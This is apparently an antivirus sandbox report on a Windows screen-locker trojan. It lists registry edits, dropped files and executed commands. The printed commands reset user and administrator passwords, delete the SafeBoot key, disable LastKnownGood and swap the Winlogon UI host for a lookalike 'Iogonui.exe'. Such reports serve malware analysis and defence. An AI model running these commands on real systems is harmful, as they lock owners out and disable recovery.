Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'password_off' = '%TEMP%\password_off.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'UIHost' = ''
- %TEMP%\password_on.exe
- %TEMP%\artmoney.exe
- <SYSTEM32>\net1.exe user %USERNAME% "Путин, вор!"
- <SYSTEM32>\reg.exe delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot" /f
- <SYSTEM32>\net1.exe user администратор "Путин, вор!"
- <SYSTEM32>\net1.exe user admin "Путин, вор!"
- <SYSTEM32>\net1.exe user админ "Путин, вор!"
- <SYSTEM32>\cmd.exe /c ""%TEMP%\password_on.bat" "
- <SYSTEM32>\wscript.exe "%TEMP%\password_on.vbs"
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v UIHost /t REG_EXPAND_SZ /d Iogonui.exe /f
- <SYSTEM32>\reg.exe add "HKLM\SYSTEM\Select" /v LastKnownGood /t REG_DWORD /d 0 /f
- <SYSTEM32>\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v password_off /t REG_SZ /d %TEMP%\password_off.exe /f
- %TEMP%\password_on.vbs
- %TEMP%\password_on.exe
- <SYSTEM32>\Iogonui.exe
- %TEMP%\password_on.bat
- %TEMP%\password_off.exe
- %TEMP%\artmoney.exe
- %TEMP%\backgroundDefault.jpg
- %TEMP%\Iogonui.exe
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''